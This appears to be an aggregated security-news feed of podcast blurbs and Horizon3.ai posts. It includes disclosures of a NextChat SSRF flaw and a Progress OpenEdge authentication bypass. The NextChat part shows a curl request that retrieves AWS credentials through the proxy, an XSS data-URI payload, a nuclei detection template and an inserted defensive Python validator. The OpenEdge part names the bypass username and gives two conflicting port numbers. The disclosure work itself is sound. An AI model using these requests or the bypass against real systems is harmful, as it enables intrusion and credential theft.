Infosec and Cyber Work Hacks are here to help you pass the CISSP exam! This is part one of a two-part Cyber Work in which Infosec’s CISSP boot camp instructor Steve Spearman gives you his top tips and tricks for taking the CISSP exam! In part one, we’ll talk about what makes the CISSP such a difficult exam, common mistakes people make while taking the exam and what to do if, heaven forbid, you don’t pass on the first try. You don’t have to do this alone, but you need to listen to Spearman's suggestions.

– Learn more about the CISSP: https://resources.infosecinstitute.com/overview/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/

0:00 - CISSP exam tips
1:43 - What makes the CISSP challenging? 
4:51 - Common mistakes taking the CISSP
8:00 - Tricks for taking the CISSP test
11:40 - Advice on retaking the test
16:05 - Best advice for CISSP exam day
16:36 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To

11 March 2024 at 13:01

With the advent of generative AI, AI chatbots are everywhere. While users can chat with large-language models (LLMs) using a SaaS provider like OpenAI, there are lots of standalone chatbot applications available for users to deploy and use too. These standalone applications generally offer a richer user interface than OpenAI, additional features such as the ability to plug in and test different models, and the ability to potentially bypass IP block restrictions.

From our research, the most widely deployed standalone Gen AI chatbot is NextChat, a.k.a ChatGPT-Next-Web. This is a GitHub project with 63K+ stars and 52K+ forks. The Shodan query title:NextChat,"ChatGPT Next Web" pulls up 7500+ exposed instances, mostly in China and the US.

This application is vulnerable to a critical full-read server-side request forgery (SSRF) vulnerability, CVE-2023-49785, that we disclosed to the vendor in November 2023. As of this writing, there is no patch for the vulnerability, and since 90+ days have passed since our original disclosure, we are now releasing full details here.

CVE-2023-49785: A Super SSRF

NextChat is a Next.js-based Javascript application, and most of its functionality is implemented as client-side code.

There are, however, a few exposed server endpoints. One of these endpoints is at /api/cors, and it functions by design as an open proxy, allowing unauthenticated users to send arbitrary HTTP requests through it. This endpoint appears to have been added to support saving client-side chat data to WebDAV servers. The presence of this endpoint is an anti-pattern: it allows clients to bypass built-in browser protections for accessing cross-domain resources by accessing them through a server-side endpoint instead.

For instance to access Google through this proxy, one can make the following request:

SSRF vulnerabilities vary considerably in terms of real-world impact. This particular SSRF is about as bad as it gets. It’s dangerous because:

  • It enables access to arbitrary HTTP endpoints, including any internal endpoints
  • It returns the full response from any accessed HTTP endpoints
  • It supports arbitrary HTTP methods such as POST, PUT, etc by setting the method header. Request bodies are also passed along.
  • URL query parameters can be passed along with URL encoding.
  • It supports passing along an Authorization header in requests.

If this application is exposed on the Internet, an attacker essentially has full access to any other HTTP resources accessible in the same internal network as the application. The only limitation is passing along other headers such as Cookie or Content-Type, though there may be creative ways to inject these headers.

Here’s an example of accessing the AWS cloud metadata service to retrieve AWS access keys off an AWS EC2 instance running with IMDSv1 enabled:

sh-3.2# curl http://54.145.48.76:3000/api/cors/http/169.254.169.254/latest/meta-data/iam/security-credentials/REDACTED
{
  "Code" : "Success",
  "LastUpdated" : "2024-03-08T00:22:17Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA-REDACTED",
  "SecretAccessKey" : "C2CW-REDACTED",
  "Token" : "IQoJb3JpZ2luX2VjENH-REDACTED",
  "Expiration" : "2024-03-08T06:58:15Z"
}
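As an added example, not NextChat's code, the following Python shows the kind of check the /api/cors endpoint lacks. rebuild_target() reconstructs the outbound URL from the request path in the way the requests on this page imply (the first path segment is the scheme, the remaining segments are joined with '/', and a percent-encoded segment such as http:%2f%2fhost%23 decodes to http://host# so that everything appended afterwards lands in the fragment); that reading is the example's own, not taken from the project's source. is_safe_target() then refuses anything that is not http(s), carries credentials, points at a non-public address literal, or names a host outside an allowlist. ALLOWED_HOSTS is a placeholder for this example.

```python
"""Rebuild the outbound URL a NextChat-style /api/cors/<path> request would fetch and decide
whether a hardened proxy should forward it.

Added example, not NextChat's code. The reconstruction follows the request shapes shown on
this page (scheme first, remaining segments joined with '/'); ALLOWED_HOSTS is a placeholder.
"""
import ipaddress
from urllib.parse import unquote, urlsplit

PREFIX = "/api/cors/"
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"webdav.example.com"}  # assumption: the one WebDAV backend this deployment needs


def rebuild_target(cors_path):
    """'/api/cors/http/169.254.169.254/latest/' -> 'http://169.254.169.254/latest/'.

    Each segment is percent-decoded before joining, so 'http:%2f%2fhost%23' becomes the
    single segment 'http://host#' and the '://' added below ends up in the URL fragment.
    """
    if not cors_path.startswith(PREFIX):
        raise ValueError("not an /api/cors/ path")
    segments = [unquote(s) for s in cors_path[len(PREFIX):].split("/")]
    scheme, rest = segments[0], segments[1:]
    return f"{scheme}://{'/'.join(rest)}"


def is_safe_target(url):
    """True only for a credential-free http(s) URL whose host is either a public, non-multicast
    address literal or a name on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # rejects data:, file:, gopher: and friends
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        return False  # no empty host, no user@ tricks
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname. Only allowlisted names pass; a real deployment must also resolve the
        # name and apply the address test below to the result (DNS rebinding), which this
        # offline example skips on purpose.
        return host.lower() in ALLOWED_HOSTS
    # Address literal: 169.254.169.254, 127.0.0.1, 10/8, ::1, fd00::/8 and so on all fail here.
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def decide(cors_path):
    """Return (reconstructed_target, forward?) for one request path."""
    target = rebuild_target(cors_path)
    return target, is_safe_target(target)


if __name__ == "__main__":
    for path in (
        "/api/cors/http/169.254.169.254/latest/meta-data/iam/security-credentials/",
        "/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23",
        "/api/cors/https/webdav.example.com/dav/backup.json",
    ):
        print(decide(path))
```

The allowlist is the real control; the address-literal test is defence in depth and is insufficient on its own, because a hostname can resolve to 169.254.169.254 or 127.0.0.1 at request time. A production check must resolve the name, apply the same test to every resolved address, and connect to that address rather than re-resolving. Even then this is a mitigation, not a substitute for removing the open proxy.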

Reflected XSS

Almost all reflected XSS vulnerabilities are of little value to attackers. But we thought it was interesting to note that this vulnerability can be used to directly trigger an XSS without loading another site. This is because the fetch method used by the /api/cors endpoint also supports the data protocol.

For instance, the following payload:

data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23

will be decoded to <script>alert(document.domain)</script> at the server and sent back to the client, resulting in XSS:

Mitigations

Our assessment of this vulnerability puts the CVSS base score at 9.1 (critical). The vulnerability not only enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies.

As of this writing, there is no patch for the vulnerability. More than 90 days have passed since our original contact.

  • Nov. 25, 2023: Horizon3 reports security issue to ChatGPT-Next-Web via GitHub vulnerability disclosure process
  • Nov. 26, 2023: Vendor accepts the report
  • Dec. 6, 2023: GitHub CNA reserves CVE-2023-49785
  • Jan. 15, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.
  • Mar. 7, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.
  • Mar. 11, 2024: Public disclosure

We recommend that users not expose this application on the Internet. If it must be exposed to the Internet, ensure it is on an isolated network with no access to any other internal resources. Beware that attackers can still use the application as an open proxy to disguise malicious traffic to other targets.

Detection

The following nuclei template can be used to detect this vulnerability. The vulnerable code was introduced in Sept. 2023. The majority of instances online, including any instances using the more recent “NextChat” name, are highly likely to be vulnerable.

id: CVE-2023-49785

info:
  name: CVE-2023-49785
  author: nvn1729
  severity: critical
  description: Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
  remediation: |
    Do not expose to the Internet
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-49785
  tags: cve-2023-49785,ssrf,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS interaction from second request
        words:
          - "dns"
      
      - type: dsl
        dsl:
          - 'contains(body_1, "<script>alert(document.domain)</script>") && contains(header_1, "text/html")' # XSS validation in first request
          - 'contains(header_2, "X-Interactsh-Version")' # Or got HTTP response back from Interact server

Conclusion

Over the last two years, we have observed the rapid pace of development of new generative AI applications, and there is a big appetite to use and experiment with these applications. We’ve also observed a steady blurring of lines between personal use and corporate use. While NextChat is primarily meant for personal use, we’ve seen it in a few of our own client environments.

Security has simply not kept up, in both AppSec practices and vulnerability disclosure processes. The focus of the infosec community and media at large has been on “security harms” like prompt injection or model poisoning, but there are lots of high impact, conventional vulnerabilities to be found. We recommend users exercise caution when exposing any unvetted Gen AI tools to the Internet.

The post NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To appeared first on Horizon3.ai.

CVE-2024-1403: Progress OpenEdge Authentication Bypass Deep-Dive

6 March 2024 at 16:58

On February 27, 2024, Progress released a security advisory for OpenEdge, their application development and deployment platform suite. The advisory details an authentication bypass vulnerability that affects certain components of the OpenEdge platform. Our proof of concept can be found here.

When the OpenEdge Authentication Gateway (OEAG) is configured with an OpenEdge Domain that uses the OS local authentication provider to grant user-id and password logins on operating platforms supported by active releases of OpenEdge, a vulnerability in the authentication routines may lead to unauthorized access on attempted logins.

Similarly, when an AdminServer connection is made by OpenEdge Explorer (OEE) and OpenEdge Management (OEM), it also utilizes the OS local authentication provider on supported platforms to grant user-id and password logins that may also lead to unauthorized login access.

OpenEdge Architecture

The OpenEdge platform has several different components that can be deployed across an environment:

  1. OpenEdge Management (an enterprise version of OpenEdge Explorer)
  2. OpenEdge Enterprise RDBMS
  3. OpenEdge Replication
  4. OpenEdge Authentication Gateway (OEAG)
  5. Progress Application Server (PAS) for OpenEdge
  6. Progress Developer Studio (PDS) for OpenEdge

Typically the OpenEdge Management, OpenEdge Enterprise RDBMS, and PAS roles are deployed on a system and act as the backend, central source of information for developers using PDS as clients to develop applications. If the Authentication Gateway is in use, it centrally manages authentication across the OpenEdge ecosystem.

Figure 1. Example OpenEdge Deployment

Finding The Vulnerable Component

In this case, we were unable to obtain a patched system to perform patch diffing, but there are quite a few interesting details that can be picked from the advisory. The advisory states: “The AdminServer logins are always potentially vulnerable because they only support OS local logins”. Additionally the temporary mitigations specify:

The following mitigation options are intended for short-term use until you can apply the provided OpenEdge Update to your deployments. The revised “auth.dll” library associated with the OS you’re using should be copied into $DLC/bin to replace the vulnerable version of the “auth.dll” library that existed in LTS Updates 11.7.18, 12.2.13 or 12.8.0.

Given this information, we install OpenEdge Management, the RDBMS, and PAS on a single Windows server, inspect the running services with Task Manager, and find that these roles start the “AdminServer” service referenced in the advisory.

Figure 2. AdminServer service running

Now that we have the vulnerable component running, we turn to an often overlooked part of reversing: spending hours reading documentation. The documentation for the AdminServer service states that it is a Java RMI service listening by default on tcp/20931 and references several command line utilities that communicate with it:

  • This is the RMI port used by command line utilities: proadsv, asbman, wtbman, nsman, restman, and pre OpenEdge 12.0 fathom cmd line tooling
  • The default listening port for the AdminServer (-port) remains 20931 for all versions.

Inspecting our listening connections on the Windows server, we find that the AdminServer is indeed listening on tcp/20931.

Figure 3. AdminServer service listening

Inspecting the command used to kick off the Java process, we find it loads several Progress JARs and calls com.progress.chimera.adminserver.AdminServerStarter.

Figure 4. AdminServer command line

Reversing the AdminServer Service

We find that the com.progress.chimera.adminserver.AdminServerStarter class is defined in C:\Progress\OpenEdge\java\progress.jar. Inspecting the class, we find that when a remote connection is made, the connect() method is called and expects a user-supplied username and password.

Figure 5. AdminServer connect()

The connect() method interestingly loads a native system library, auth.dll, and eventually calls the authorizeUser() method defined in it. Replacing auth.dll was mentioned in the temporary mitigations so we’re likely on the right track.

Figure 6. Loading auth.dll

Opening up auth.dll in Ghidra, we find that it exports several functions to be available as Java interfaces, one of which is our authorizeUser() function.

Figure 7. Java Interfaces from auth.dll

The authorizeUser() function performs some basic input validation, ensures the supplied credentials meet certain criteria, and passes control to a function we named vulnerable_checks() (defined at 0x1800051a0). This function does further validation, but getting right to the meat of the vulnerability: on line 262 the user-supplied AccountName (username) is compared to the string NT AUTHORITY/SYSTEM. If it matches, you are authenticated.

Figure 8. If username == “NT AUTHORITY/SYSTEM”: you may pass

That's the vulnerability.

Figure 9. It's a feature

Impact

While we have bypassed authentication, finding attack surface to abuse for further impact, such as remote code execution, was the next goal.

Deserialization

Java Remote Method Invocation (RMI) interfaces frequently suffer from deserialization vulnerabilities, but in this case there were no classic libraries in the class path of the service to easily abuse with a ysoserial gadget. We did confirm that deserialization is possible with a simple out-of-band DNS request payload, but did not spend the time to develop a custom gadget from the in-scope libraries. Remote code execution is likely possible via this avenue.

Abuse of Built In Functionality

We spent the better part of a day looking for easily abusable functionality within the available RMI interfaces. Easily reachable functionality allows a user to start, stop, and list performance metrics of applications. Deeper attack surface looks like it may allow a user to deploy new applications via remote WAR file references, but reaching it is dramatically more complex because of the use of internal service message brokers and custom messages. We believe there is again likely an avenue to remote code execution via built-in functionality given enough research effort.

Creating a Proof of Concept

We continue our investigation by re-examining the AdminServer class and dbman.bat, which makes use of the AdminServer. We find that we can connect to the AdminServer over RMI at rmi://<target_ip>:29031/Chimera. We get back an IAdminServerConnection, which exposes two connect methods that require a username and password. From dbman.bat we know we need to encode the username and password using an Encoder from oeauth-12.8.0.jar.

Now that we are connected to the AdminServer, what can we do? We can use the following code to display all interfaces available to us from the AdminServer's getPlugins method:

We get the following output:

com.progress.system.SystemPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.agent.database.IAgentPlugIn
com.progress.ubroker.tools.NSRemoteObject
com.progress.chimera.common.IChimeraHierarchy
com.progress.ubroker.tools.IYodaRMI
com.progress.ubroker.tools.IYodaSharedResources
com.progress.ubroker.tools.UBRemoteCommand
com.progress.chimera.common.IChimeraRemoteCommand
com.progress.juniper.admin.JAPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.juniper.admin.IJAPlugIn
com.progress.agent.smdatabase.SMPlugIn
com.progress.chimera.common.IChimeraRemoteObject

From here, we leave it as an exercise to the reader to figure out what you can do with the above interfaces. Our proof of concept can be found here.

NOTE: We will not be distributing the Progress JARs given we do not own that code. These JARs can be obtained from an OpenEdge installation and are required to run the proof of concept.

Indicators of Compromise

When a connection is made to the AdminServer service, logs are written to C:\OpenEdge\WRK\admserv. An example log entry can be seen below, recording the authenticating user as well as the Java interfaces that user accesses (the UBRemoteCommand class in our case). While it seems that accessing this service via the NT AUTHORITY/SERVICE account was intended, we did not observe log entries associated with this account outside of service startup. We also were not running a production server, where more service traffic may be generated and observed.

The post CVE-2024-1403: Progress OpenEdge Authentication Bypass Deep-Dive appeared first on Horizon3.ai.

Horizon3.ai Unveils Pentesting Services for Compliance Ahead of PCI DSS v4.0 Rollout

5 March 2024 at 14:04

Business Wire 03/05/2024

Horizon3.ai, a pioneer in autonomous security solutions, today announced the availability of the Horizon3.ai Pentesting Services for Compliance. Horizon3.ai recognizes that demand for pentesting expertise is at an all-time high…

Read the entire article here

The post Horizon3.ai Unveils Pentesting Services for Compliance Ahead of PCI DSS v4.0 Rollout appeared first on Horizon3.ai.

What help do CISOs need in 2024? | Guest Alicia Olson

By: Infosec
4 March 2024 at 20:00

Alicia Olson, VP of Communications at Optiv, is today's guest. Olson came to cybersecurity from the oil and gas sector. She tells us how she got interested in communications for security professionals, explains how she turned Optiv’s distributed workforce into a cohesive unit and gives CISOs some crucial advice and ideas for dealing with that moment that no one wants to have to explain — the inevitable security breach. 

0:00 - What do CISOs need in 2024?
1:40 - Working in communications
3:50 - Average workday as a VP of communications
6:56 - Cybersecurity issues with communications 
9:50 - Why work in cybersecurity communications? 
13:00 - How to enter cybersecurity communication roles
17:50 - Women mentoring women in cybersecurity 
19:35 - Supporting DEI in cybersecurity
23:00 - Biggest problems for CISOs in 2024
25:05 - Missing CISO skills you should learn
27:38 - Remediation in cybersecurity communication
29:30 - Olson's best piece of career advice
30:15 - Learn more about Optiv
30:55 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


What’s the true impact on your organization when an employee is phished?

29 February 2024 at 20:13

You can now fully assess the impact of phished credentials on your organization. Tune in to this webinar to watch the NodeZero platform evaluate the blast radius of every phished credential as it comes in, using the Phishing Impact test.

The post What’s the true impact on your organization when an employee is phished? appeared first on Horizon3.ai.

What a CISSP boot camp is like | Cyber Work Hacks

By: Infosec
29 February 2024 at 19:00

Infosec and the Cyber Work Hacks podcast are here to help you prepare for and pass the CISSP exam from ISC2. For today’s hack, we’re talking boot camps. If you’ve been working through the Certified Information Systems Security Professional (CISSP) study guide for six months or more, you might learn better in a concentrated, focused environment with expert instruction.

And that expert is Infosec boot camp instructor Steve Spearman, who has helped hundreds of learners prepare for and pass their CISSP. Steve will walk you through what the Infosec 7-day CISSP boot camp is like, which can make the difference between passing on the first try and the headache and heartache of having to re-sit the exam. 

0:00 - What is a CISSP boot camp?
1:37 - A boot camp versus university cybersecurity education
2:47 - What is a cybersecurity boot camp schedule like? 
6:54 - Cybersecurity boot camp communication 
9:50 - Cybersecurity boot camp homework
12:13 - Taking a cybersecurity certification exam
15:44 - Is a cybersecurity boot camp right for me? 
17:36 - Outro


Meet Alessio Romano – Penetration Tester

By: o___o
28 February 2024 at 06:39
My first approach to the world of computing, contrary to what one might expect, was similar to that of many others who, like me, were born at the end of the 1990s: the first time I interacted with a computer I did nothing more than turn it on, open an mp3 file with the media player of […]

Ethical hacking careers vs. cinema: What it's like to work as a hacker | Cyber Work Live

By: Infosec
26 February 2024 at 19:00

Don't believe the movies and TV shows — ethical hacking is not done by frantically typing on the keyboard in a race against the clock.

What's a career in ethical hacking and penetration testing really like? Join our panel of experts who have worked in the field for decades to find out!

In this one-hour live event, we'll cover:

0:00 - Ethical hacking fact vs fiction
7:45 - First, getting into cybersecurity
12:00 - Does ethical hacking fiction affect people?
19:20 - Cybersecurity students in higher ed
26:17 - Qualifying for penetration testing jobs
31:21 - A real-life cybersecurity attack
42:30 - Does Hollywood inspire cybersecurity workers?
44:30 - U.S. Cybergames
47:40 - Infosec Skills and real-life learning
50:35 - Cybersecurity career jump
53:30 - Criminal justice and cybersecurity
56:25 - From IT support to cybersecurity
59:00 - Outro

